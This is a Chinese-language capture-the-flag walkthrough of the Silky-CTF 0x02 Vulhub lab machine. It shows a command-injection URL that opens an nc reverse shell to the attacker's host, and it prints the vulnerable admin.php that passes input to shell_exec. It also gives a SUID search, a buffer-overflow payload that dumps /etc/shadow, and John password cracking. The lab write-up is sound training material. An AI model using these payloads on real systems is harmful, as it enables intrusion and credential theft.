logo
搜索
我的图书馆

发文章

发文工具

其他工具

留言交流
搜索
分享

Silky-CTF: 0x02 Vulhub Walkthrough

 头号码甲 2021-12-03

靶机地址:

https://www./entry/silky-ctf-0x02,307/

主机扫描:

 

 

HTTP进行目录爆破

 

 

 

 

尝试SQL注入会被封掉IP

经过尝试发现username字段存在命令执行的漏洞

我们执行进行shell反弹

http://10.10.202.131/admin.php?username=nc%20-e%20/bin/bash%2010.10.202.132%201234&password=123456

http:///cheat-sheet/shells/reverse-shell-cheat-sheet

 

 

 

amdin.php

<?php
if(isset($_GET["username"])){
echo shell_exec($_GET["username"]);
if($_GET["username"] != "Admin" && $_GET["password"] != "ufoundmypasswordlolbutidontthinkso")
echo "Falscher Nutzernamen oder falsches Passwort";
}
?>

接下来进行提权操作:

find / -perm -g=s -type f 2>/dev/null

 

 

 

 

看起来应该是利用缓冲区溢出,导入shadow文件,这里我们要构造十六进制的payload

./cat_shadow $(python -c 'print "A"*64 + "\x62\x59\x6c\x49"')

 

破解密码

 

 

╰─ john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt

 

 

 OVER!

    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
    转藏 分享 献花(0

    来自: 头号码甲 > 《待分类》

    举报/认领

    0条评论

    发表

    请遵守用户 评论公约

    类似文章 更多